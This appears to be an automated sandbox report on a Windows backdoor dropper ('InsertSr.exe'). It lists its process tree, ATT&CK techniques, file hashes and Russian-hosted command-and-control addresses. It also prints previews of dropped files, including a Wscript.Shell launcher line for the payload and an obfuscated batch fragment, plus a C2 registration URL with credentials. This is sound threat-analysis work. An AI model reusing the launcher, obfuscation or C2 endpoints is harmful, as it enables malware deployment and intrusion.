Source: Virtuoso.scr.11.dr; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

      Remote Access Functionality

Source: Yara match; File source: Process Memory Space: Intranet.pif PID: 1292, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Virtuoso.scr PID: 2404, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a number in front of a technique is the report's signature-count badge for it)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 1 Native API; 1 Command and Scripting Interpreter; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 11 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 112 Process Injection; 2 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 111 Masquerading; 2 Valid Accounts; 21 Access Token Manipulation; 112 Process Injection
Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 27 System Information Discovery; 31 Security Software Discovery; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 21 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 2 Application Layer Protocol; 1 Proxy; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1565338; Sample: InsertSr.exe; Start date: 29/11/2024; Architecture: WINDOWS; Score: 100
Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected GO Backdoor; 3 other signatures. DNS name queried: qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi

Process tree recovered from the behavior graph:
InsertSr.exe
  cmd.exe; drops C:\Users\user\AppData\Local\...\Intranet.pif (PE32); signature: Drops PE files with a suspicious file extension
    Intranet.pif; drops C:\Users\user\AppData\Local\...\Virtuoso.scr (PE32) and C:\Users\user\AppData\Local\...\Virtuoso.js (ASCII); signatures: Drops PE files with a suspicious file extension; Injects a PE file into a foreign processes
      Intranet.pif; network: 188.130.206.243 (ports 49724, 49729, 49735; SVINT-ASNES; Russian Federation), 91.212.166.91 (ports 49723, 49728, 49734; MOBILY-AS Etihad Etisalat Company Mobily SA; United Kingdom), 3 other IPs or domains; signature: Found Tor onion address
      cmd.exe; drops C:\Users\user\AppData\...\Virtuoso.url (MS)
        conhost.exe
    cmd.exe
    conhost.exe
    7 other processes
wscript.exe; signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Virtuoso.scr; signature: Injects a PE file into a foreign processes
    Virtuoso.scr; network: 109.172.87.135 (ports 22016, 49730; SUMTEL-AS-RIPE Moscow Russia RU; Russian Federation); signature: Found Tor onion address

Source | Detection | Scanner | Label
InsertSr.exe | 16% | ReversingLabs | Win32.Trojan.Generic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | 8% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | 8% | ReversingLabs | -

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://91.212.166.91188.130.206.243:80P | 0% | Avira URL Cloud | safe
http://188.130.206.243http://46.8.232.106 | 0% | Avira URL Cloud | safe
http://93.185.159.253P | 0% | Avira URL Cloud | safe
http://188.130.206.243 | 0% | Avira URL Cloud | safe
http://188.130.206.243X-Content-Type-OptionsP. | 0% | Avira URL Cloud | safe
http://188.130.206.243/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi | unknown | unknown | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
http://46.8.232.106/ | false | - | high
http://46.8.236.61/ | false | - | high
http://93.185.159.253/ | false | - | high
http://188.130.206.243/ | false | Avira URL Cloud: safe | unknown
http://91.212.166.91/ | false | - | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000000.2154258238.0000000000569000.00000002.00000001.01000000.00000007.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Virtuoso.scr, 00000011.00000000.2289162050.0000000000249000.00000002.00000001.01000000.00000009.sdmp, Intranet.pif, 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp, Virtuoso.scr, 00000016.00000000.2724020520.0000000000249000.00000002.00000001.01000000.00000009.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | false | - | high
http://46.8.232.106 | Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://91.212.166.91188.130.206.243:80P | Virtuoso.scr, 00000016.00000002.3382375239.000000000A07A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://188.130.206.243http://46.8.232.106 | Intranet.pif, 00000013.00000002.3383490052.000000000A0EE000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F0000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://188.130.206.243 | Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://93.185.159.253 | Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://46.8.236.61 | Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | InsertSr.exe | false | - | high
http://93.185.159.253P | Intranet.pif, 00000013.00000002.3383490052.000000000A0E2000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A12C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3382375239.000000000A07A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | false | - | high
http://188.130.206.243X-Content-Type-OptionsP. | Intranet.pif, 00000013.00000002.3383490052.000000000A0E2000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.212.166.91 | Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | false
188.130.206.243 | unknown | Russian Federation | 200509 | SVINT-ASNES | false
109.172.87.135 | unknown | Russian Federation | 41691 | SUMTEL-AS-RIPE Moscow Russia RU | true
93.185.159.253 | unknown | Russian Federation | 39912 | I3B-AS AT | false
91.212.166.91 | unknown | United Kingdom | 35819 | MOBILY-AS Etihad Etisalat Company Mobily SA | false
46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | false
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1565338
                              Start date and time:2024-11-29 16:23:15 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 3s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:23
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:InsertSr.exe
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winEXE@32/21@3/6
                              EGA Information:
                              • Successful, ratio: 33.3%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 33
                              • Number of non-executed functions: 368
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Intranet.pif, PID 1292 because there are no executed functions
• Execution Graph export aborted for target Virtuoso.scr, PID 2404 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: InsertSr.exe
Time | Type | Description
10:24:11 | API Interceptor | 8x Sleep call for process: Intranet.pif modified
10:24:26 | API Interceptor | 9x Sleep call for process: Virtuoso.scr modified
16:24:13 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.8.232.106 | iKhdG3bwZK.exe | malicious | GO Backdoor
• 46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
46.8.232.106 | Week11.exe | malicious | GO Backdoor
• 46.8.232.106/
46.8.232.106 | Week11.exe.bin.exe | malicious | GO Backdoor
• 46.8.232.106/
46.8.232.106 | m0Yc9KltGw.exe | malicious | GO Backdoor
• 46.8.232.106/
46.8.232.106 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor
• 46.8.232.106/
46.8.232.106 | BwqqVoHR71.exe | malicious | GO Backdoor
• 46.8.232.106/
46.8.232.106 | BwqqVoHR71.exe | malicious | GO Backdoor
• 46.8.232.106/
46.8.232.106 | sV9ElC4fU4.exe | malicious | GO Backdoor
• 46.8.232.106/
46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor
• 46.8.232.106/
46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor
• 46.8.232.106/
188.130.206.243 | iKhdG3bwZK.exe | malicious | GO Backdoor
• 188.130.206.243:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
188.130.206.243 | Week11.exe | malicious | GO Backdoor
• 188.130.206.243/
188.130.206.243 | Week11.exe.bin.exe | malicious | GO Backdoor
• 188.130.206.243/
188.130.206.243 | m0Yc9KltGw.exe | malicious | GO Backdoor
• 188.130.206.243/
188.130.206.243 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor
• 188.130.206.243/
188.130.206.243 | BwqqVoHR71.exe | malicious | GO Backdoor
• 188.130.206.243/
188.130.206.243 | BwqqVoHR71.exe | malicious | GO Backdoor
• 188.130.206.243/
188.130.206.243 | antispam_connect1.exe | malicious | GO Backdoor
• 188.130.206.243/
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SVINT-ASNES | x86_64.nn.elf | malicious | Mirai, Okiru
• 188.130.200.151
SVINT-ASNES | iKhdG3bwZK.exe | malicious | GO Backdoor
• 188.130.206.243
SVINT-ASNES | Week11.exe | malicious | GO Backdoor
• 188.130.206.243
SVINT-ASNES | Week11.exe.bin.exe | malicious | GO Backdoor
• 188.130.206.243
SVINT-ASNES | m0Yc9KltGw.exe | malicious | GO Backdoor
• 188.130.206.243
SVINT-ASNES | https://t.ly/Oppenheim0511 | malicious | GO Backdoor
• 188.130.206.243
SVINT-ASNES | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor
• 188.130.206.243
SVINT-ASNES | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown
• 188.130.206.243
SVINT-ASNES | BwqqVoHR71.exe | malicious | GO Backdoor
• 188.130.206.243
SVINT-ASNES | BwqqVoHR71.exe | malicious | GO Backdoor
• 188.130.206.243
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | iKhdG3bwZK.exe | malicious | GO Backdoor
• 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | ppc.elf | malicious | Mirai
• 46.8.228.104
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | file.exe | malicious | Cryptbot
• 46.8.237.112
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
• 46.8.237.112
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | file.exe | malicious | Clipboard Hijacker, Cryptbot
• 46.8.237.112
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | Week11.exe | malicious | GO Backdoor
• 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | Week11.exe.bin.exe | malicious | GO Backdoor
• 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | m0Yc9KltGw.exe | malicious | GO Backdoor
• 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | https://t.ly/Oppenheim0511 | malicious | GO Backdoor
• 46.8.232.106
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | SecuriteInfo.com.FileRepMalware.3248.17662.exe | malicious | Unknown
• 46.8.237.66
SUMTEL-AS-RIPE Moscow Russia RU | iKhdG3bwZK.exe | malicious | GO Backdoor
• 109.172.88.38
SUMTEL-AS-RIPE Moscow Russia RU | 7rfw2HqJjJ.exe | malicious | CredGrabber, Meduza Stealer
• 109.172.94.66
SUMTEL-AS-RIPE Moscow Russia RU | RafaelConnect.exe | malicious | Unknown
• 89.221.225.227
SUMTEL-AS-RIPE Moscow Russia RU | RafaelConnect.exe | malicious | Unknown
• 89.221.225.227
SUMTEL-AS-RIPE Moscow Russia RU | file.exe | malicious | CredGrabber, Meduza Stealer
• 109.172.94.66
SUMTEL-AS-RIPE Moscow Russia RU | file.exe | malicious | CredGrabber, Meduza Stealer
• 109.172.94.66
SUMTEL-AS-RIPE Moscow Russia RU | sh4.elf | malicious | Unknown
• 87.117.138.145
SUMTEL-AS-RIPE Moscow Russia RU | yakuza.i686.elf | malicious | Unknown
• 178.130.55.72
SUMTEL-AS-RIPE Moscow Russia RU | la.bot.arm5.elf | malicious | Unknown
• 109.172.60.44
SUMTEL-AS-RIPE Moscow Russia RU | BwqqVoHR71.exe | malicious | GO Backdoor
• 109.172.88.38
I3B-AS AT | Week11.exe | malicious | GO Backdoor
• 93.185.159.253
I3B-AS AT | Week11.exe.bin.exe | malicious | GO Backdoor
• 93.185.159.253
I3B-AS AT | XWHcHAzqPR.exe | malicious | Unknown
• 195.16.240.249
I3B-AS AT | byte.sh4.elf | malicious | Mirai, Okiru
• 195.16.237.179
I3B-AS AT | m0Yc9KltGw.exe | malicious | GO Backdoor
• 93.185.159.253
I3B-AS AT | https://t.ly/Oppenheim0511 | malicious | GO Backdoor
• 93.185.159.253
I3B-AS AT | la.bot.sh4.elf | malicious | Unknown
• 195.16.243.93
I3B-AS AT | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor
• 93.185.159.253
I3B-AS AT | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown
• 93.185.159.253
I3B-AS AT | BwqqVoHR71.exe | malicious | GO Backdoor
• 93.185.159.253
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | vqMMwqCFZQ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | fT0L8msd6q.exe | malicious | Unknown
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | fT0L8msd6q.exe | malicious | Unknown
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | qaHUaPUib8.exe | malicious | Unknown
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | qaHUaPUib8.exe | malicious | Unknown
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | eddzD2MA12.exe | malicious | Stealc, Vidar
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | file.exe | malicious | PureLog Stealer, XWorm
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | file.exe | malicious | XWorm
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RAT
C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | vqMMwqCFZQ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | fT0L8msd6q.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | fT0L8msd6q.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | qaHUaPUib8.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | qaHUaPUib8.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | eddzD2MA12.exe | malicious | Stealc, Vidar
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | file.exe | malicious | PureLog Stealer, XWorm
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | file.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RAT
C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar
Process:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
File Type:data
Category:dropped
Size (bytes):7042413
Entropy (8bit):7.999973722573661
Encrypted:true
SSDEEP:196608:uV4QJVZB9GvmVt8iDJ21EJsTuMb5sk3/4mD5UK:w4KRVtV921EJSu8iknx
MD5:C4959BED137FD2E510CE19330623A16A
SHA1:20AA56927D0563CE4EA72483B7205A58B8414E17
SHA-256:E2AFAB12762BC0DEAFF044721F64D322A21E1A35F8054DE5C2E488E5EFA33208
SHA-512:A34D1C63FCE327AC1E75E6FFDB85EDA74591982339FB60FD96407BE82714BBAEA27E2A7F288BAB405562572962A3772F2F0603B8474408D464CCCBA038666764
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):187
Entropy (8bit):4.622268306964676
Encrypted:false
SSDEEP:3:RiMIpGXIdPHo55wWAX+eLCMuL4EkD5s12TrABDc1FZo5uWAX+eLCMuL4EkD5s12t:RiJBJHonwWDeLPqJkDRABDsFywWDeLPp
MD5:29DF653FF635132CD3766BBCE1240C5E
SHA1:1827AD4C0A40430C70F11D8794493C44B379B0DF
SHA-256:CD44A6B65BBFB205987C90C2CBEC8B59867C3DEE3AB71A27BBBC4C8318D5A5E7
SHA-512:833A142D3D807FE4A451C2613F9B28D3C67844BE9E737CAB59A5CD93B67035AF5F22B5A4BAB788DF967209EB587788895C5CD6885695D5DA93950607E07867F2
Malicious:true
Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\Immersive Creations Co\\Virtuoso.scr\" \"C:\\Users\\user\\AppData\\Local\\Immersive Creations Co\\D\"")
Process:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):893608
Entropy (8bit):6.62028134425878
Encrypted:false
SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:18CE19B57F43CE0A5AF149C96AECC685
SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:
• Filename: vqMMwqCFZQ.exe, Detection: malicious
• Filename: fT0L8msd6q.exe, Detection: malicious
• Filename: fT0L8msd6q.exe, Detection: malicious
• Filename: qaHUaPUib8.exe, Detection: malicious
• Filename: qaHUaPUib8.exe, Detection: malicious
• Filename: eddzD2MA12.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):893608
Entropy (8bit):6.62028134425878
Encrypted:false
SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:18CE19B57F43CE0A5AF149C96AECC685
SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:
• Filename: vqMMwqCFZQ.exe, Detection: malicious
• Filename: fT0L8msd6q.exe, Detection: malicious
• Filename: fT0L8msd6q.exe, Detection: malicious
• Filename: qaHUaPUib8.exe, Detection: malicious
• Filename: qaHUaPUib8.exe, Detection: malicious
• Filename: eddzD2MA12.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
Process:C:\Windows\SysWOW64\cmd.exe
File Type:data
Category:dropped
Size (bytes):7042413
Entropy (8bit):7.999973722573661
Encrypted:true
SSDEEP:196608:uV4QJVZB9GvmVt8iDJ21EJsTuMb5sk3/4mD5UK:w4KRVtV921EJSu8iknx
MD5:C4959BED137FD2E510CE19330623A16A
SHA1:20AA56927D0563CE4EA72483B7205A58B8414E17
SHA-256:E2AFAB12762BC0DEAFF044721F64D322A21E1A35F8054DE5C2E488E5EFA33208
SHA-512:A34D1C63FCE327AC1E75E6FFDB85EDA74591982339FB60FD96407BE82714BBAEA27E2A7F288BAB405562572962A3772F2F0603B8474408D464CCCBA038666764
Malicious:false
Process:C:\Users\user\Desktop\InsertSr.exe
File Type:data
Category:dropped
Size (bytes):738304
Entropy (8bit):7.999753098638204
Encrypted:true
SSDEEP:12288:QxtXQU/qjySgw7bfixzEekvoaLaW1N8oSJcAj9SG0YSXwq63+mI+eyUu6WRx2zo+:QfgUSGnw7bCzfha2mN8okhSXYSX8ZeZf
MD5:44A5825233B5A360E932CFE68E9FEEDF
SHA1:2A3B1AF094F7C2B9A521C22C8EE8765630ECF4B7
SHA-256:7C327D77A5331CF24562249717F8709BDDCF71327F824EE8B4842E57CC67BD40
SHA-512:FCC654899E1084551AA7E95229DA507677590DD23338AB32465B18019EEEC5016F1B888CEB37E749DEA8256F261960C21F9A5FA3718CAC93E96C257923CA89C3
Malicious:false
Process:C:\Users\user\Desktop\InsertSr.exe
File Type:ASCII text, with very long lines (376), with CRLF line terminators
Category:dropped
Size (bytes):9945
Entropy (8bit):5.17404966843657
Encrypted:false
SSDEEP:192:LVnJWezHSpuHD4O6FKgImRV5OM5YuDkTpM6nHgzPMj0kWtj7mqGSwDqcBJ:LVnWpuHqfRBWuoT3edkI7mq7w2aJ
MD5:A1B1D9BF9A8803A0AA03003DB6E5C5BB
SHA1:280689244F6513993389EB16BC445AB27D4A5E8D
SHA-256:A2191B6F2BDDE77BD52659322A374E952AFCAE826429095A676D8A439C56D522
SHA-512:0F1687D351F2291F9FD3487BACD3BDB3A93F2A515CAE11941A3A72EB5CBFBDE6CC6F6F4F27C09CEC78C92DCFAD5E6B3D8DCC124C158D27A67D0AB4FF3A1A87F7
Malicious:false
Preview:Set Shoe=q..pwGConf-Speeds-Months-Jumping-Mirrors-Cave-Demonstrated-Scratch-..EEBias-Bible-Ticket-Canberra-..vBSfMary-Dictionary-Supports-Rewards-Threaded-Examples-Aquarium-Accepts-Depend-..hIGorgeous-Nights-Pottery-Reliability-..VBbbSexual-Four-School-Criteria-Interaction-Recorder-Reputation-..NCjExpansys-Oe-Shemales-..WMFantasy-Hr-Charm-..KABPrivacy-Steal-Unto-..Set Spectacular=0..ovKaren-Expressed-Coverage-Blood-Convergence-Stops-..xnScVaccine-Solo-Seasonal-Surgeon-Election-Maintained-Enforcement-..CFMjDesign-Highways-Just-Finals-Obtain-Suicide-Marked-Cohen-Soundtrack-..XsQFlat-Ivory-Facial-..JWXPlus-Cc-Initiative-Reality-..Set 